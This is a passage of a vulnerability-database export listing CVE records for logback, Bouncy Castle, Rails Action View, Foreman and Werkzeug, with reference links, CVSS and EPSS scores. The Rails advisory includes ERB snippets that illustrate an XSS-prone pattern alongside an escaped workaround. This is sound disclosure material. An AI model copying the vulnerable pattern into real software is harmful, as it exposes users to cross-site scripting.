scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r4673642893562c58cbee60c151ded6c077e8a2d02296e862224a9161@%3Ccommits.cassandra.apache.org%3E
17
reference_url https://lists.apache.org/thread.html/r632ec30791b441e2eb5a3129532bf1b689bf181d0ef7daf50bcf0fd6@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r632ec30791b441e2eb5a3129532bf1b689bf181d0ef7daf50bcf0fd6@%3Ccommits.cassandra.apache.org%3E
18
reference_url https://lists.apache.org/thread.html/r718f27bed898008a8e037d9cc848cfc1df4d18abcbaee0cb0c142cfb@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r718f27bed898008a8e037d9cc848cfc1df4d18abcbaee0cb0c142cfb@%3Ccommits.cassandra.apache.org%3E
19
reference_url https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9@%3Cdev.brooklyn.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9@%3Cdev.brooklyn.apache.org%3E
20
reference_url https://lists.apache.org/thread.html/ra007cec726a3927c918ec94c4316d05d1829c49eae8dc3648adc35e2@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra007cec726a3927c918ec94c4316d05d1829c49eae8dc3648adc35e2@%3Ccommits.cassandra.apache.org%3E
21
reference_url https://lists.apache.org/thread.html/rbb4dfca2f7e3e8f3570eec21c79832d33a51dfde6762725660b60169@%3Cdev.mnemonic.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rbb4dfca2f7e3e8f3570eec21c79832d33a51dfde6762725660b60169@%3Cdev.mnemonic.apache.org%3E
22
reference_url https://lists.apache.org/thread.html/rc5f0cc2f3b153bdf15ee7389d78585829abc9c7af4d322ba1085dd3e@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rc5f0cc2f3b153bdf15ee7389d78585829abc9c7af4d322ba1085dd3e@%3Ccommits.cassandra.apache.org%3E
23
reference_url https://lists.apache.org/thread.html/rd2227af3c9ada2a72dc72ed05517f5857a34d487580e1f2803922ff9@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd2227af3c9ada2a72dc72ed05517f5857a34d487580e1f2803922ff9@%3Ccommits.cassandra.apache.org%3E
24
reference_url https://lists.apache.org/thread.html/re9b787727291786dfe088e3cd078c7d195c0b5781e15d3cd24a3b2fc@%3Cdev.mnemonic.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/re9b787727291786dfe088e3cd078c7d195c0b5781e15d3cd24a3b2fc@%3Cdev.mnemonic.apache.org%3E
25
reference_url https://logback.qos.ch/news.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://logback.qos.ch/news.html
26
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-5929
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-5929
27
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1432858
reference_id 1432858
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1432858
28
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=857343
reference_id 857343
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=857343
29
reference_url http://www.cvedetails.com/cve/CVE-2017-5929/
reference_id CVE-2017-5929
reference_type
scores
url http://www.cvedetails.com/cve/CVE-2017-5929/
30
reference_url https://github.com/advisories/GHSA-vmfg-rjjm-rjrj
reference_id GHSA-vmfg-rjjm-rjrj
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vmfg-rjjm-rjrj
31
reference_url https://access.redhat.com/errata/RHSA-2020:0983
reference_id RHSA-2020:0983
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:0983
fixed_packages
aliases CVE-2017-5929, GHSA-vmfg-rjjm-rjrj
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2y5d-qg7z-2kdg
5
url VCID-31h9-7jrr-9kdt
vulnerability_id VCID-31h9-7jrr-9kdt
summary In the Bouncy Castle JCE Provider versions 1.51 to 1.55, a carry propagation bug was introduced in the implementation of squaring for several raw math classes have been fixed (org.bouncycastle.math.raw.Nat???). These classes are used by our custom elliptic curve implementations (org.bouncycastle.math.ec.custom.**), so there was the possibility of rare (in general usage) spurious calculations for elliptic curve scalar multiplications. Such errors would have been detected with high probability by the output validation for our scalar multipliers.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000340.json
reference_id
reference_type
scores
0
value 2.9
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000340.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000340
reference_id
reference_type
scores
0
value 0.00397
scoring_system epss
scoring_elements 0.60573
published_at 2026-04-09T12:55:00Z
1
value 0.00397
scoring_system epss
scoring_elements 0.60558
published_at 2026-04-13T12:55:00Z
2
value 0.00397
scoring_system epss
scoring_elements 0.60579
published_at 2026-04-12T12:55:00Z
3
value 0.00397
scoring_system epss
scoring_elements 0.60594
published_at 2026-04-11T12:55:00Z
4
value 0.00397
scoring_system epss
scoring_elements 0.60436
published_at 2026-04-01T12:55:00Z
5
value 0.00397
scoring_system epss
scoring_elements 0.60512
published_at 2026-04-02T12:55:00Z
6
value 0.00397
scoring_system epss
scoring_elements 0.60538
published_at 2026-04-04T12:55:00Z
7
value 0.00397
scoring_system epss
scoring_elements 0.60508
published_at 2026-04-07T12:55:00Z
8
value 0.00397
scoring_system epss
scoring_elements 0.60557
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000340
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000340
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000340
5
reference_url https://github.com/bcgit/bc-java
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java
6
reference_url https://github.com/bcgit/bc-java/commit/790642084c4e0cadd47352054f868cc8397e2c00
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/790642084c4e0cadd47352054f868cc8397e2c00
7
reference_url https://github.com/bcgit/bc-java/commit/790642084c4e0cadd47352054f868cc8397e2c00#diff-e5934feac8203ca0104ab291a3560a31
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/790642084c4e0cadd47352054f868cc8397e2c00#diff-e5934feac8203ca0104ab291a3560a31
8
reference_url https://security.netapp.com/advisory/ntap-20181127-0004
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181127-0004
9
reference_url https://security.netapp.com/advisory/ntap-20181127-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20181127-0004/
10
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588688
reference_id 1588688
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588688
12
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
13
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000340
reference_id CVE-2016-1000340
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:N/I:P/A:N
1
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
2
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000340
14
reference_url https://github.com/advisories/GHSA-r97x-3g8f-gx3m
reference_id GHSA-r97x-3g8f-gx3m
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-r97x-3g8f-gx3m
fixed_packages
aliases CVE-2016-1000340, GHSA-r97x-3g8f-gx3m
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-31h9-7jrr-9kdt
6
url VCID-31xv-z8c6-a7bg
vulnerability_id VCID-31xv-z8c6-a7bg
summary 
XSS in Action View
There is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks.

### Impact

When an HTML-unsafe string is passed as the default for a missing translation key [named `html` or ending in `_html`](https://guides.rubyonrails.org/i18n.html#using-safe-html-translations), the default string is incorrectly marked as HTML-safe and not escaped. Vulnerable code may look like the following examples:

```erb
<%# The welcome_html translation is not defined for the current locale: %>
<%= t("welcome_html", default: untrusted_user_controlled_string) %>

<%# Neither the title.html translation nor the missing.html translation is defined for the current locale: %>
<%= t("title.html", default: [:"missing.html", untrusted_user_controlled_string]) %>
```

### Patches

Patched Rails versions, 6.0.3.3 and 5.2.4.4, are available from the normal locations.

The patches have also been applied to the `master`, `6-0-stable`, and `5-2-stable` branches on GitHub. If you track any of these branches, you should update to the latest.

To aid users who aren’t able to upgrade immediately, we’ve provided patches for the two supported release series. They are in git-am format and consist of a single changeset.

* [5-2-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-5-2-translate-helper-xss-patch) — patch for the 5.2 release series
* [6-0-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-6-0-translate-helper-xss-patch) — patch for the 6.0 release series

Please note that only the 5.2 and 6.0 release series are currently supported. Users of earlier, unsupported releases are advised to update as soon as possible, as we cannot provide security fixes for unsupported releases.

### Workarounds

Impacted users who can’t upgrade to a patched Rails version can avoid this issue by manually escaping default translations with the `html_escape` helper (aliased as `h`):

```erb
<%= t("welcome_html", default: h(untrusted_user_controlled_string)) %>
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-15169.json
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-15169.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15169
reference_id
reference_type
scores
0
value 0.01497
scoring_system epss
scoring_elements 0.81116
published_at 2026-04-13T12:55:00Z
1
value 0.01497
scoring_system epss
scoring_elements 0.81123
published_at 2026-04-12T12:55:00Z
2
value 0.01497
scoring_system epss
scoring_elements 0.81136
published_at 2026-04-11T12:55:00Z
3
value 0.01497
scoring_system epss
scoring_elements 0.81118
published_at 2026-04-09T12:55:00Z
4
value 0.01497
scoring_system epss
scoring_elements 0.81112
published_at 2026-04-08T12:55:00Z
5
value 0.01497
scoring_system epss
scoring_elements 0.81085
published_at 2026-04-07T12:55:00Z
6
value 0.01497
scoring_system epss
scoring_elements 0.81061
published_at 2026-04-02T12:55:00Z
7
value 0.01497
scoring_system epss
scoring_elements 0.81052
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15169
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
5
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
7
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
8
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
9
reference_url https://github.com/rails/rails
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rails/rails
10
reference_url https://github.com/rails/rails/commit/e663f084460ea56c55c3dc76f78c7caeddeeb02e
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rails/rails/commit/e663f084460ea56c55c3dc76f78c7caeddeeb02e
11
reference_url https://github.com/rails/rails/security/advisories/GHSA-cfjv-5498-mph5
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rails/rails/security/advisories/GHSA-cfjv-5498-mph5
12
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-15169.yml
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-15169.yml
13
reference_url https://groups.google.com/g/rubyonrails-security/c/b-C9kSGXYrc
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://groups.google.com/g/rubyonrails-security/c/b-C9kSGXYrc
14
reference_url https://lists.debian.org/debian-lts-announce/2020/10/msg00015.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/10/msg00015.html
15
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB
16
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/
17
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15169
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15169
18
reference_url https://www.debian.org/security/2020/dsa-4766
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2020/dsa-4766
19
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1877566
reference_id 1877566
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1877566
20
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=970040
reference_id 970040
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=970040
21
reference_url https://github.com/advisories/GHSA-cfjv-5498-mph5
reference_id GHSA-cfjv-5498-mph5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cfjv-5498-mph5
22
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
fixed_packages
aliases CVE-2020-15169, GHSA-cfjv-5498-mph5
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-31xv-z8c6-a7bg
7
url VCID-3af2-c1m7-3kdr
vulnerability_id VCID-3af2-c1m7-3kdr
summary foreman: authorization bypasses in foreman-tasks leading to information disclosure
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10198.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10198.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-10198
reference_id
reference_type
scores
0
value 0.01423
scoring_system epss
scoring_elements 0.80547
published_at 2026-04-01T12:55:00Z
1
value 0.01423
scoring_system epss
scoring_elements 0.80554
published_at 2026-04-02T12:55:00Z
2
value 0.01423
scoring_system epss
scoring_elements 0.80576
published_at 2026-04-04T12:55:00Z
3
value 0.01423
scoring_system epss
scoring_elements 0.80568
published_at 2026-04-07T12:55:00Z
4
value 0.01423
scoring_system epss
scoring_elements 0.80597
published_at 2026-04-08T12:55:00Z
5
value 0.01423
scoring_system epss
scoring_elements 0.80606
published_at 2026-04-09T12:55:00Z
6
value 0.01423
scoring_system epss
scoring_elements 0.80624
published_at 2026-04-11T12:55:00Z
7
value 0.01423
scoring_system epss
scoring_elements 0.80611
published_at 2026-04-12T12:55:00Z
8
value 0.01423
scoring_system epss
scoring_elements 0.80602
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-10198
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1729130
reference_id 1729130
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1729130
fixed_packages
aliases CVE-2019-10198
risk_score 3.0
exploitability 0.5
weighted_severity 5.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3af2-c1m7-3kdr
8
url VCID-3t8t-yt9b-1fce
vulnerability_id VCID-3t8t-yt9b-1fce
summary Cross-site scripting (XSS) vulnerability in the render_full function in debug/tbtools.py in the debugger in Pallets Werkzeug before 0.11.11 (as used in Pallets Flask and other products) allows remote attackers to inject arbitrary web script or HTML via a field that contains an exception message.
references
0
reference_url http://blog.neargle.com/2016/09/21/flask-src-review-get-a-xss-from-debuger
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://blog.neargle.com/2016/09/21/flask-src-review-get-a-xss-from-debuger
1
reference_url http://blog.neargle.com/2016/09/21/flask-src-review-get-a-xss-from-debuger/
reference_id
reference_type
scores
url http://blog.neargle.com/2016/09/21/flask-src-review-get-a-xss-from-debuger/
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-10516.json
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-10516.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-10516
reference_id
reference_type
scores
0
value 0.00314
scoring_system epss
scoring_elements 0.54554
published_at 2026-04-04T12:55:00Z
1
value 0.00314
scoring_system epss
scoring_elements 0.5453
published_at 2026-04-02T12:55:00Z
2
value 0.00314
scoring_system epss
scoring_elements 0.54455
published_at 2026-04-01T12:55:00Z
3
value 0.00411
scoring_system epss
scoring_elements 0.61371
published_at 2026-04-13T12:55:00Z
4
value 0.00411
scoring_system epss
scoring_elements 0.61321
published_at 2026-04-07T12:55:00Z
5
value 0.00411
scoring_system epss
scoring_elements 0.61368
published_at 2026-04-08T12:55:00Z
6
value 0.00411
scoring_system epss
scoring_elements 0.61384
published_at 2026-04-09T12:55:00Z
7
value 0.00411
scoring_system epss
scoring_elements 0.61405
published_at 2026-04-11T12:55:00Z
8
value 0.00411
scoring_system epss
scoring_elements 0.6139
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-10516
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10516
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10516
5
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:P/I:P/A:N
1
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
6
reference_url https://github.com/advisories/GHSA-h2fp-xgx6-xh6f
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-h2fp-xgx6-xh6f
7
reference_url https://github.com/pallets/werkzeug
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pallets/werkzeug
8
reference_url https://github.com/pallets/werkzeug/commit/1034edc7f901dd645ec6e462754111b39002bd65
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pallets/werkzeug/commit/1034edc7f901dd645ec6e462754111b39002bd65
9
reference_url https://github.com/pallets/werkzeug/pull/1001
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pallets/werkzeug/pull/1001
10
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/werkzeug/PYSEC-2017-43.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/werkzeug/PYSEC-2017-43.yaml
11
reference_url https://lists.debian.org/debian-lts-announce/2017/11/msg00037.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2017/11/msg00037.html
12
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1512102
reference_id 1512102
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1512102
13
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:*
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-10516
reference_id CVE-2016-10516
reference_type
scores
0
value 4.3
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:N/I:P/A:N
1
value 6.1
scoring_system cvssv3
